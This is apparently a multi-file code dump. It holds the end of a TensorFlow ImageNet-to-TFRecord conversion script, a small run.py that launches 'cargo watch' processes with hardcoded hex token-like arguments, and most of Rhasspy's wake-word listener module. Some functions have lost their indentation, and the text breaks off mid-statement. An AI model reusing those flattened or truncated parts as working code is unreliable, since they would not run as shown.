filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
    """Process a single image file.

    Args:
      filename: string, path to an image file e.g., '/path/to/example.JPG'.
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
    Returns:
      image_buffer: string, JPEG encoding of RGB image.
      height: integer, image height in pixels.
      width: integer, image width in pixels.
    """
    # Read the raw bytes from disk.
    image_data = tf.gfile.FastGFile(filename, 'rb').read()

    # Clean the known-dirty files before decoding.
    if _is_png(filename):
        # 1 image is a PNG.
        print('Converting PNG to JPEG for %s' % filename)
        image_data = coder.png_to_jpeg(image_data)
    elif _is_cmyk(filename):
        # 22 JPEG images are in CMYK colorspace.
        print('Converting CMYK to RGB for %s' % filename)
        image_data = coder.cmyk_to_rgb(image_data)

    # Decode the RGB JPEG and verify the result is a 3-channel image.
    decoded = coder.decode_jpeg(image_data)
    assert len(decoded.shape) == 3
    assert decoded.shape[2] == 3
    height, width = decoded.shape[0], decoded.shape[1]

    return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
    """Processes and saves list of images as TFRecord in 1 thread.

    Args:
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
      thread_index: integer, unique batch to run index is within [0, len(ranges)).
      ranges: list of pairs of integers specifying ranges of each batches to
        analyze in parallel.
      name: string, unique identifier specifying the data set
      filenames: list of strings; each string is a path to an image file
      synsets: list of strings; each string is a unique WordNet ID
      labels: list of integer; each integer identifies the ground truth
      humans: list of strings; each string is a human-readable label
      bboxes: list of bounding boxes for each image. Note that each entry in this
        list might contain from 0+ entries corresponding to the number of bounding
        box annotations for the image.
      num_shards: integer number of shards for this data set.
    """
    # Each thread produces N shards where N = int(num_shards / num_threads).
    # For instance, if num_shards = 128, and the num_threads = 2, then the first
    # thread would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)

    # Evenly split this thread's file range into per-shard sub-ranges.
    shard_ranges = np.linspace(ranges[thread_index][0],
                               ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

    counter = 0
    for s in range(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_directory, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)

        shard_counter = 0
        files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in files_in_shard:
            filename = filenames[i]
            label = labels[i]
            synset = synsets[i]
            human = humans[i]
            bbox = bboxes[i]

            image_buffer, height, width = _process_image(filename, coder)

            example = _convert_to_example(filename, image_buffer, label,
                                          synset, human, bbox,
                                          height, width)
            writer.write(example.SerializeToString())
            shard_counter += 1
            counter += 1

            # Periodic progress report every 1000 images.
            if not counter % 1000:
                print('%s [thread %d]: Processed %d of %d images in thread batch.' %
                      (datetime.now(), thread_index, counter, num_files_in_thread))
                sys.stdout.flush()

        print('%s [thread %d]: Wrote %d images to %s' %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print('%s [thread %d]: Wrote %d images to %d shards.' %
          (datetime.now(), thread_index, counter, num_files_in_thread))
    sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
                         bboxes, num_shards):
    """Process and save list of images as TFRecord of Example protos.

    Args:
      name: string, unique identifier specifying the data set
      filenames: list of strings; each string is a path to an image file
      synsets: list of strings; each string is a unique WordNet ID
      labels: list of integer; each integer identifies the ground truth
      humans: list of strings; each string is a human-readable label
      bboxes: list of bounding boxes for each image. Note that each entry in this
        list might contain from 0+ entries corresponding to the number of bounding
        box annotations for the image.
      num_shards: integer number of shards for this data set.
    """
    assert len(filenames) == len(synsets)
    assert len(filenames) == len(labels)
    assert len(filenames) == len(humans)
    assert len(filenames) == len(bboxes)

    # Break all images into batches with a [ranges[i][0], ranges[i][1]].
    # Use the builtin `int`: the `np.int` alias was deprecated in NumPy 1.20
    # and removed in 1.24, so `.astype(np.int)` fails on modern NumPy.
    spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
    ranges = []
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])

    # Launch a thread for each batch.
    print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
    sys.stdout.flush()

    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()

    # Create a generic TensorFlow-based utility for converting all image codings.
    coder = ImageCoder()

    threads = []
    for thread_index in range(len(ranges)):
        args = (coder, thread_index, ranges, name, filenames,
                synsets, labels, humans, bboxes, num_shards)
        t = threading.Thread(target=_process_image_files_batch, args=args)
        t.start()
        threads.append(t)

    # Wait for all the threads to terminate.
    coord.join(threads)
    print('%s: Finished writing all %d images in data set.' %
          (datetime.now(), len(filenames)))
    sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
    """Build a list of all images files and labels in the data set.

    Args:
      data_dir: string, path to the root directory of images, laid out as
        data_dir/<synset>/<image>.JPEG (e.g. data_dir/n01440764/...).
      labels_file: string, path to the labels file; one synset per line.
        Synsets are mapped to integer labels starting at 1 (label 0 is
        reserved as an unused background class), in file order.
    Returns:
      filenames: list of strings; each string is a path to an image file.
      synsets: list of strings; each string is a unique WordNet ID.
      labels: list of integer; each integer identifies the ground truth.
    """
    print('Determining list of input files and labels from %s.' % data_dir)
    challenge_synsets = [l.strip() for l in
                         tf.gfile.FastGFile(labels_file, 'r').readlines()]

    labels = []
    filenames = []
    synsets = []

    # Construct the list of JPEG files and labels; label index 0 is left
    # empty as a background class, so enumeration starts at 1.
    for label_index, synset in enumerate(challenge_synsets, 1):
        jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
        matching_files = tf.gfile.Glob(jpeg_file_path)

        labels.extend([label_index] * len(matching_files))
        synsets.extend([synset] * len(matching_files))
        filenames.extend(matching_files)

        if not label_index % 100:
            print('Finished finding files in %d of %d classes.' % (
                label_index, len(challenge_synsets)))

    # Shuffle the ordering of all image files in order to guarantee
    # random ordering of the images with respect to label in the
    # saved TFRecord files. Make the randomization repeatable.
    # (The permutation produced by random.shuffle depends only on the seed
    # and the sequence length, so this matches shuffling an index list.)
    random.seed(12345)
    order = list(range(len(filenames)))
    random.shuffle(order)

    filenames = [filenames[i] for i in order]
    synsets = [synsets[i] for i in order]
    labels = [labels[i] for i in order]

    print('Found %d JPEG files across %d labels inside %s.' %
          (len(filenames), len(challenge_synsets), data_dir))
    return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
  """Look up the bounding boxes for each image file.

  Args:
    filenames: list of strings; each string is a path to an image file.
    image_to_bboxes: dictionary mapping image file names to a list of
      bounding boxes. This list contains 0+ bounding boxes.

  Returns:
    List of bounding boxes for each image, aligned with `filenames`. Images
    without annotations get an empty list.
  """
  bboxes = []
  num_annotated = 0
  for path in filenames:
    # Annotations are keyed by the bare file name, not the full path.
    key = os.path.basename(path)
    has_boxes = key in image_to_bboxes
    bboxes.append(image_to_bboxes[key] if has_boxes else [])
    num_annotated += int(has_boxes)
  print('Found %d images with bboxes out of %d images' % (
      num_annotated, len(filenames)))
  return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human, image_to_bboxes):
  """Process a complete data set and save it as a TFRecord.

  Orchestration only: gathers files/labels, resolves metadata, then hands
  everything to the sharded writer.

  Args:
    name: string, unique identifier specifying the data set.
    directory: string, root path to the data set.
    num_shards: integer number of shards for this data set.
    synset_to_human: dict of synset to human labels, e.g.,
      'n02119022' --> 'red fox, Vulpes vulpes'
    image_to_bboxes: dictionary mapping image file names to a list of
      bounding boxes. This list contains 0+ bounding boxes.
  """
  # filenames/synsets/labels come back pre-shuffled and index-aligned.
  filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
  humans = _find_human_readable_labels(synsets, synset_to_human)
  bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
  _process_image_files(name, filenames, synsets, labels, humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
  """Build lookup for synset to human-readable label.

  Args:
    imagenet_metadata_file: string, path to file containing mapping from
      synset to human-readable label. Each line must be formatted as
      <synset>\t<human readable label>, e.g.:

        n02119247	black fox
        n02119359	silver fox
        n02119477	red fox, Vulpes fulva

  Returns:
    Dictionary of synset to human labels, such as:
      'n02119022' --> 'red fox, Vulpes vulpes'

  Raises:
    AssertionError: if a non-empty line does not split into exactly two
      tab-separated fields.
  """
  synset_to_human = {}
  for line in tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines():
    if not line:
      continue  # skip empty lines
    fields = line.strip().split('\t')
    assert len(fields) == 2
    synset_to_human[fields[0]] = fields[1]
  return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
  """Build a lookup from image file to bounding boxes.

  Args:
    bounding_box_file: string, path to file with bounding boxes annotations
      (the output of process_bounding_boxes.py). Each line corresponds to
      one bounding box annotation and can be parsed as:

        <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>

      e.g. n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940. An image file
      may appear on multiple lines (multiple annotations).

  Returns:
    Dictionary mapping image file names to a list of bounding boxes. This
    list contains 0+ bounding boxes.

  Raises:
    AssertionError: if a non-empty line does not have exactly 5 fields.
  """
  images_to_bboxes = {}
  num_bbox = 0
  num_image = 0
  for line in tf.gfile.FastGFile(bounding_box_file, 'r').readlines():
    if not line:
      continue  # skip empty lines
    fields = line.split(',')
    assert len(fields) == 5, ('Failed to parse: %s' % line)
    filename = fields[0]
    # Coordinates are stored as [xmin, ymin, xmax, ymax] floats.
    box = [float(c) for c in fields[1:]]
    if filename not in images_to_bboxes:
      images_to_bboxes[filename] = []
      num_image += 1
    images_to_bboxes[filename].append(box)
    num_bbox += 1
  print('Successfully read %d bounding boxes '
        'across %d images.' % (num_bbox, num_image))
  return images_to_bboxes
def main(unused_argv):
  """Entry point: convert the ImageNet train/validation splits to TFRecords.

  Args:
    unused_argv: command-line args, already consumed by the flags parser.

  Raises:
    AssertionError: if the shard counts are not divisible by the number of
      worker threads (each thread must own a whole number of shards).
  """
  assert not FLAGS.train_shards % FLAGS.num_threads, (
      'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
  assert not FLAGS.validation_shards % FLAGS.num_threads, (
      'Please make the FLAGS.num_threads commensurate with '
      'FLAGS.validation_shards')
  print('Saving results to %s' % FLAGS.output_directory)

  # Build a map from synset to human-readable label; both lookups are
  # shared by the two splits below.
  synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
  image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)

  # Run it!
  _process_dataset('validation', FLAGS.validation_directory,
                   FLAGS.validation_shards, synset_to_human, image_to_bboxes)
  _process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
                   synset_to_human, image_to_bboxes)
if __name__ == '__main__':
  # Parse flags and dispatch to main() via the TF app runner.
  tf.app.run()
|
run.py | import subprocess;
from threading import Thread
# cargo watch -x "run -- -i=529f07b0b1d5d3df52b0440bad708090 -k=192.168.0.1 -p=5602 -t=2dc6bb40e73417bba878d3c8e3e08780 -c=192.168.0.1:5200 -n=5100 -d='d://workstation/expo/rust/fdb/data'"
# First port handed to a spawned actor process.
base_port = 5611
# How many actor processes to launch.
no_of_actors = 1
def make_cmd(port):
    """Build the `cargo watch` command line for one actor on the given port.

    Args:
        port: int, TCP port inserted into the `-p=` argument.

    Returns:
        str: the full shell command for this actor.
    """
    base_cmd = 'cargo watch -x "run -- -i=529f07b0b1d5d3df52b0440bad708090 -k=192.168.0.1 -p={} -t=2dc6bb40e73417bba878d3c8e3e08780 -c=192.168.0.1:5200 -n=5100 -d=d://workstation/expo/rust/fdb/data"'
    return base_cmd.format(port)
def run_cmd(cmd):
    """Run *cmd* in a shell, wait for it to exit, and print its raw stdout.

    Uses subprocess.run so the child is reaped (the original Popen +
    stdout.read() never waited on the process, leaving a zombie).

    Args:
        cmd: str, shell command to execute (built internally by make_cmd,
            not from untrusted input, so shell=True is acceptable here).
    """
    completed = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
    # Print the captured stdout bytes, matching the original behavior.
    print(completed.stdout)
# Launch one thread per actor, each running its own `cargo watch` command on
# a consecutive port, then wait for all of them to finish.
threads = []
for _ in range(no_of_actors):
    cmd = make_cmd(base_port)
    worker = Thread(target=run_cmd, args=(cmd,))
    worker.start()
    threads.append(worker)
    base_port += 1

for thread in threads:
    thread.join()
|
wake.py | """Wake word support."""
import json
import os
import re
import shutil
import struct
import subprocess
import threading
import time
from pathlib import Path
from typing import Any, Dict, Iterable, List, Optional, Type
from rhasspy.actor import RhasspyActor
from rhasspy.events import (
AudioData,
ListenForWakeWord,
MqttMessage,
MqttSubscribe,
StartStreaming,
StopListeningForWakeWord,
StopStreaming,
WakeWordDetected,
WakeWordNotDetected,
PauseListeningForWakeWord,
ResumeListeningForWakeWord,
)
from rhasspy.utils import read_dict
# -----------------------------------------------------------------------------
def get_wake_class(system: str) -> Type[RhasspyActor]:
    """Get type for profile wake system.

    Maps a wake-system name from the profile to the actor class that
    implements it. Raises AssertionError for unknown names.
    """
    # One entry per supported backend; "dummy" is the no-op listener.
    wake_classes: Dict[str, Type[RhasspyActor]] = {
        "dummy": DummyWakeListener,
        "pocketsphinx": PocketsphinxWakeListener,  # pocketsphinx locally
        "hermes": HermesWakeListener,  # remote system via MQTT
        "snowboy": SnowboyWakeListener,  # snowboy locally
        "precise": PreciseWakeListener,  # Mycroft Precise locally
        "porcupine": PorcupineWakeListener,  # Picovoice's porcupine locally
        "command": CommandWakeListener,  # command-line listener
    }
    assert system in wake_classes, ("Invalid wake system: %s" % system)
    return wake_classes[system]
# -----------------------------------------------------------------------------
class DummyWakeListener(RhasspyActor):
    """No-op wake listener: never detects a wake word."""

    def in_started(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in started state (all messages are ignored)."""
        pass
# -----------------------------------------------------------------------------
# Pocketsphinx based wake word listener
# https://github.com/cmusphinx/pocketsphinx
# -----------------------------------------------------------------------------
class PocketsphinxWakeListener(RhasspyActor):
    """Listens for a wake word with pocketsphinx.

    State machine: started -> loaded -> listening <-> paused. Audio chunks
    arrive as AudioData messages and are fed to a pocketsphinx keyword
    decoder; on a hypothesis, WakeWordDetected is sent to all receivers.
    """

    def __init__(self) -> None:
        RhasspyActor.__init__(self)
        # Actors that get WakeWordDetected / WakeWordNotDetected events.
        self.receivers: List[RhasspyActor] = []
        self.decoder = None
        # True while a pocketsphinx utterance is open (start_utt called).
        self.decoder_started: bool = False
        self.preload = False
        self.not_detected = False
        self.chunk_size = 960
        self.recorder: Optional[RhasspyActor] = None
        self.threshold = 0.0
        self.keyphrase = ""

    def to_started(self, from_state: str) -> None:
        """Transition to started state."""
        self.recorder = self.config["recorder"]
        self.preload = self.config.get("preload", False)
        self.not_detected = self.config.get("not_detected", False)
        self.chunk_size = self.profile.get("wake.pocketsphinx.chunk_size", 960)
        if self.preload:
            # NOTE(review): self._lock is not defined in this class —
            # presumably provided by RhasspyActor; confirm.
            with self._lock:
                try:
                    self.load_decoder()
                except Exception:
                    self._logger.exception("loading wake decoder")
        self.transition("loaded")

    def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in loaded state."""
        if isinstance(message, ListenForWakeWord):
            self.load_decoder()
            self.receivers.append(message.receiver or sender)
            self.transition("listening")
            if message.record:
                self.send(self.recorder, StartStreaming(self.myAddress))

    def in_listening(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in listening state."""
        if isinstance(message, AudioData):
            if not self.decoder_started:
                assert self.decoder is not None
                self.decoder.start_utt()
                self.decoder_started = True

            # Feed the audio to the decoder in fixed-size chunks, stopping
            # early as soon as the keyphrase is detected.
            audio_data = message.data
            chunk = audio_data[: self.chunk_size]
            detected = False
            while len(chunk) > 0:
                result = self.process_data(chunk)
                if result is not None:
                    detected = True
                    self._logger.debug("Hotword detected (%s)", self.keyphrase)
                    detected_msg = WakeWordDetected(
                        self.keyphrase, audio_data_info=message.info
                    )
                    for receiver in self.receivers:
                        self.send(receiver, detected_msg)
                    break

                audio_data = audio_data[self.chunk_size :]
                chunk = audio_data[: self.chunk_size]

            # End utterance (only after a detection; otherwise the open
            # utterance spans subsequent AudioData messages)
            if detected and self.decoder_started:
                assert self.decoder is not None
                self.decoder.end_utt()
                self.decoder_started = False

            if not detected and self.not_detected:
                # Report non-detection
                not_detected_msg = WakeWordNotDetected(
                    self.keyphrase, audio_data_info=message.info
                )
                for receiver in self.receivers:
                    self.send(receiver, not_detected_msg)
        elif isinstance(message, StopListeningForWakeWord):
            if message.clear_all:
                self.receivers.clear()
            else:
                try:
                    self.receivers.remove(message.receiver or sender)
                except ValueError:
                    pass

            if len(self.receivers) == 0:
                # End utterance
                if self.decoder_started:
                    assert self.decoder is not None
                    self.decoder.end_utt()
                    self.decoder_started = False

                if message.record:
                    self.send(self.recorder, StopStreaming(self.myAddress))

                self.transition("loaded")
        elif isinstance(message, PauseListeningForWakeWord):
            self.transition("paused")

    def in_paused(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in paused state."""
        if isinstance(message, ResumeListeningForWakeWord):
            self.transition("listening")

    # -------------------------------------------------------------------------

    def process_data(self, data: bytes) -> Optional[str]:
        """Process single chunk of audio.

        Returns the hypothesis string when the keyphrase is detected,
        otherwise None. Closes the open utterance on detection.
        """
        assert self.decoder is not None
        self.decoder.process_raw(data, False, False)
        hyp = self.decoder.hyp()
        if hyp:
            if self.decoder_started:
                self.decoder.end_utt()
                self.decoder_started = False

            return hyp.hypstr

        return None

    # -------------------------------------------------------------------------

    def load_decoder(self) -> None:
        """Loads speech decoder if not cached."""
        if self.decoder is None:
            import pocketsphinx

            # Load decoder settings (use speech-to-text configuration as a fallback)
            hmm_path = self.profile.read_path(
                self.profile.get("wake.pocketsphinx.acoustic_model", None)
                or self.profile.get("speech_to_text.pocketsphinx.acoustic_model")
            )

            dict_path = self.profile.read_path(
                self.profile.get("wake.pocketsphinx.dictionary", None)
                or self.profile.get("speech_to_text.pocketsphinx.dictionary")
            )

            # Keyword-spotting threshold for pocketsphinx (-kws_threshold).
            self.threshold = float(
                self.profile.get("wake.pocketsphinx.threshold", 1e-40)
            )
            self.keyphrase = self.profile.get("wake.pocketsphinx.keyphrase", "")
            assert len(self.keyphrase) > 0, "No wake keyphrase"

            # Verify that keyphrase words are in dictionary
            keyphrase_words = re.split(r"\s+", self.keyphrase)
            with open(dict_path, "r") as dict_file:
                word_dict = read_dict(dict_file)

            dict_upper = self.profile.get("speech_to_text.dictionary_upper", False)
            for word in keyphrase_words:
                if dict_upper:
                    word = word.upper()
                else:
                    word = word.lower()

                if word not in word_dict:
                    self._logger.warning("%s not in dictionary", word)

            self._logger.debug(
                "Loading wake decoder with hmm=%s, dict=%s", hmm_path, dict_path
            )

            decoder_config = pocketsphinx.Decoder.default_config()
            decoder_config.set_string("-hmm", hmm_path)
            decoder_config.set_string("-dict", dict_path)
            decoder_config.set_string("-keyphrase", self.keyphrase)
            decoder_config.set_string("-logfn", "/dev/null")
            decoder_config.set_float("-kws_threshold", self.threshold)

            mllr_path = self.profile.read_path(
                self.profile.get("wake.pocketsphinx.mllr_matrix")
            )

            if os.path.exists(mllr_path):
                self._logger.debug(
                    "Using tuned MLLR matrix for acoustic model: %s", mllr_path
                )
                decoder_config.set_string("-mllr", mllr_path)

            self.decoder = pocketsphinx.Decoder(decoder_config)
            self.decoder_started = False
# -----------------------------------------------------------------------------
# Snowboy wake listener
# https://snowboy.kitt.ai
# -----------------------------------------------------------------------------
class SnowboyWakeListener(RhasspyActor):
    """Listen for wake word with snowboy.

    State machine: started -> loaded -> listening <-> paused. One snowboy
    detector is created per configured model; each AudioData message is fed
    to every detector in fixed-size chunks.
    """

    def __init__(self) -> None:
        RhasspyActor.__init__(self)
        # Actors that get WakeWordDetected / WakeWordNotDetected events.
        self.receivers: List[RhasspyActor] = []
        self.detectors: List[Any] = []
        self.preload = False
        self.not_detected = False
        self.chunk_size = 960
        self.recorder: Optional[RhasspyActor] = None
        self.apply_frontend = False
        # model name -> settings dict; model_names is sorted and index-aligned
        # with self.detectors.
        self.models: Dict[str, Any] = {}
        self.model_names: List[str] = []

    def to_started(self, from_state: str) -> None:
        """Transition to started state."""
        self.recorder = self.config["recorder"]
        self.preload = self.config.get("preload", False)
        self.not_detected = self.config.get("not_detected", False)
        self.chunk_size = self.profile.get("wake.snowboy.chunk_size", 960)
        if self.preload:
            try:
                self.load_detectors()
            except Exception as e:
                self._logger.warning("preload: %s", e)

        self.transition("loaded")

    def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in loaded state."""
        if isinstance(message, ListenForWakeWord):
            try:
                self.load_detectors()
                self.receivers.append(message.receiver or sender)
                self.transition("listening")
                if message.record:
                    self.send(self.recorder, StartStreaming(self.myAddress))
            except Exception:
                self._logger.exception("in_loaded")

    def in_listening(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in listening state."""
        if isinstance(message, AudioData):
            audio_data = message.data
            chunk = audio_data[: self.chunk_size]
            detected = []
            while len(chunk) > 0:
                # A positive result index means detector at that position
                # fired (snowboy returns the 1-based hotword index).
                for detector_index, result_index in enumerate(self.process_data(chunk)):
                    if result_index > 0:
                        detected.append(detector_index)

                if detected:
                    # Don't process the rest of the audio data if hotword has
                    # already been detected.
                    break

                audio_data = audio_data[self.chunk_size :]
                chunk = audio_data[: self.chunk_size]

            # Handle results
            if detected:
                # Detected
                detected_names = [self.model_names[i] for i in detected]
                self._logger.debug("Hotword(s) detected: %s", detected_names)

                # Send events
                for model_name in detected_names:
                    detected_event = WakeWordDetected(
                        model_name, audio_data_info=message.info
                    )
                    for receiver in self.receivers:
                        self.send(receiver, detected_event)
            elif self.not_detected:
                # Not detected
                for model_name in self.model_names:
                    not_detected_event = WakeWordNotDetected(
                        model_name, audio_data_info=message.info
                    )
                    for receiver in self.receivers:
                        self.send(receiver, not_detected_event)
        elif isinstance(message, StopListeningForWakeWord):
            if message.clear_all:
                self.receivers.clear()
            else:
                try:
                    self.receivers.remove(message.receiver or sender)
                except ValueError:
                    pass

            if len(self.receivers) == 0:
                if message.record:
                    self.send(self.recorder, StopStreaming(self.myAddress))

                self.transition("loaded")
        elif isinstance(message, PauseListeningForWakeWord):
            self.transition("paused")

    def in_paused(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in paused state."""
        if isinstance(message, ResumeListeningForWakeWord):
            self.transition("listening")

    # -------------------------------------------------------------------------

    def process_data(self, data: bytes) -> Iterable[int]:
        """Process single chunk of audio data with every detector.

        Yields one result per detector:
          -2 silence
          -1 error
           0 voice
           n index n-1

        BUG FIX: this is a generator, so the original
        ``return [-2] * len(self.detectors)`` in the except handler was
        discarded (a generator's return value only lands in
        StopIteration.value) — callers never received the silence fallback.
        Now each failing detector yields -2 directly.
        """
        for detector in self.detectors:
            try:
                yield detector.RunDetection(data)
            except Exception:
                self._logger.exception("process_data")
                # Report silence for this detector instead of dropping it.
                yield -2

    # -------------------------------------------------------------------------

    def load_detectors(self) -> None:
        """Load snowboy detector."""
        if not self.detectors:
            from snowboy import snowboydetect, snowboydecoder

            # Load model names and settings
            self.models = self._parse_models()
            self.model_names = sorted(list(self.models.keys()))

            # Create snowboy detectors
            for model_name in self.model_names:
                model_settings = self.models[model_name]
                model_path = Path(self.profile.read_path(model_name))
                assert model_path.is_file(), f"Missing {model_path}"

                self._logger.debug("Loading snowboy model from %s", model_path)

                detector = snowboydetect.SnowboyDetect(
                    snowboydecoder.RESOURCE_FILE.encode(), str(model_path).encode()
                )

                detector.SetSensitivity(str(model_settings["sensitivity"]).encode())
                detector.SetAudioGain(float(model_settings["audio_gain"]))
                detector.ApplyFrontend(bool(model_settings["apply_frontend"]))

                self.detectors.append(detector)
                self._logger.debug(
                    "Loaded snowboy model %s (%s)", model_name, model_settings
                )

    # -------------------------------------------------------------------------

    def _parse_models(self) -> Dict[str, Dict[str, Any]]:
        """Build per-model settings, filling gaps with profile-wide defaults."""
        # Default sensitivity
        sensitivity: str = str(self.profile.get("wake.snowboy.sensitivity", "0.5"))

        # Default audio gain
        audio_gain: float = float(self.profile.get("wake.snowboy.audio_gain", "1.0"))

        # Default frontend
        apply_frontend: bool = self.profile.get("wake.snowboy.apply_frontend", False)

        model_names: List[str] = self.profile.get(
            "wake.snowboy.model", "snowboy/snowboy.umdl"
        ).split(",")

        model_settings: Dict[str, Dict[str, Any]] = self.profile.get(
            "wake.snowboy.model_settings", {}
        )

        models_dict = {}
        for model_name in model_names:
            # Add default settings
            settings = model_settings.get(model_name, {})
            if "sensitivity" not in settings:
                settings["sensitivity"] = sensitivity

            if "audio_gain" not in settings:
                settings["audio_gain"] = audio_gain

            if "apply_frontend" not in settings:
                settings["apply_frontend"] = apply_frontend

            models_dict[model_name] = settings

        return models_dict

    # -------------------------------------------------------------------------

    def get_problems(self) -> Dict[str, Any]:
        """Get problems at startup."""
        problems: Dict[str, Any] = {}
        try:
            # pylint: disable=W0611
            from snowboy import snowboydetect, snowboydecoder  # noqa: F401
        except Exception:
            problems[
                "snowboy not installed"
            ] = "The snowboy Python library is not installed. Try pip3 install snowboy"

        # Verify that all snowboy models exist
        models = self._parse_models()
        model_paths = [
            Path(self.profile.read_path(model_name)) for model_name in models
        ]

        for model_path in model_paths:
            if not model_path.is_file():
                problems[
                    "Missing model"
                ] = f"Snowboy model could not be loaded from {model_path}"

        return problems
# -----------------------------------------------------------------------------
# Mycroft Precise wake listener
# https://github.com/MycroftAI/mycroft-precise
# -----------------------------------------------------------------------------
class PreciseWakeListener(RhasspyActor):
    """Listens for a wake word using Mycroft Precise.

    Audio is written to a ReadWriteStream consumed by a PreciseRunner in a
    background thread; the runner calls back into this actor on activation
    (via a string message to self) and on every prediction (via a
    semaphore used to synchronize not-detected reporting).
    """

    def __init__(self) -> None:
        # pylint: disable=E0401
        from precise_runner import ReadWriteStream

        RhasspyActor.__init__(self)
        # Unconsumed audio; carved into chunk_size pieces for the engine.
        self.audio_buffer: bytes = bytes()
        self.audio_info: Dict[Any, Any] = {}
        self.chunk_delay = 0
        self.chunk_size = 2048
        # Set True by the runner's on_activation callback.
        self.detected: bool = False
        self.engine = None
        self.engine_path = ""
        self.model_name = ""
        self.model_path = ""
        # Released once per prediction by the runner's callback.
        self.prediction_sem = threading.Semaphore()
        self.preload = False
        self.receivers: List[RhasspyActor] = []
        self.recorder: Optional[RhasspyActor] = None
        self.runner = None
        self.send_not_detected = False
        self.stream: Optional[ReadWriteStream] = None

    def to_started(self, from_state: str) -> None:
        """Transition to started state."""
        self.recorder = self.config["recorder"]
        self.preload = self.config.get("preload", False)
        self.send_not_detected = self.config.get("not_detected", False)
        self.chunk_size = self.profile.get("wake.precise.chunk_size", 2048)
        self.chunk_delay = self.profile.get("wake.precise.chunk_delay", 0)
        if self.preload:
            try:
                self.load_runner()
            except Exception:
                # Best effort only; loading is retried in in_loaded.
                pass

        self.transition("loaded")

    def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in loaded state."""
        if isinstance(message, ListenForWakeWord):
            try:
                self.load_runner()
                self.receivers.append(message.receiver or sender)
                self.transition("listening")
                if message.record:
                    self.send(self.recorder, StartStreaming(self.myAddress))
            except Exception:
                self._logger.exception("in_loaded")

    def in_listening(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in listening state."""
        try:
            if isinstance(message, AudioData):
                self.audio_info = message.info
                self.detected = False
                self.audio_buffer += message.data
                num_chunks = len(self.audio_buffer) // self.chunk_size
                if num_chunks > 0:
                    assert self.stream is not None
                    # Fresh semaphore so acquires below only count
                    # predictions for this batch of chunks.
                    self.prediction_sem = threading.Semaphore()
                    for _ in range(num_chunks):
                        chunk = self.audio_buffer[: self.chunk_size]
                        self.stream.write(chunk)
                        self.audio_buffer = self.audio_buffer[self.chunk_size :]

                    if self.send_not_detected:
                        # Wait for all chunks to finish processing
                        for _ in range(num_chunks):
                            self.prediction_sem.acquire(timeout=0.1)

                        # Wait a little bit for the precise engine to finish processing
                        time.sleep(self.chunk_delay)

                        if not self.detected:
                            # Not detected
                            not_detected_event = WakeWordNotDetected(
                                self.model_name, audio_data_info=message.info
                            )
                            for receiver in self.receivers:
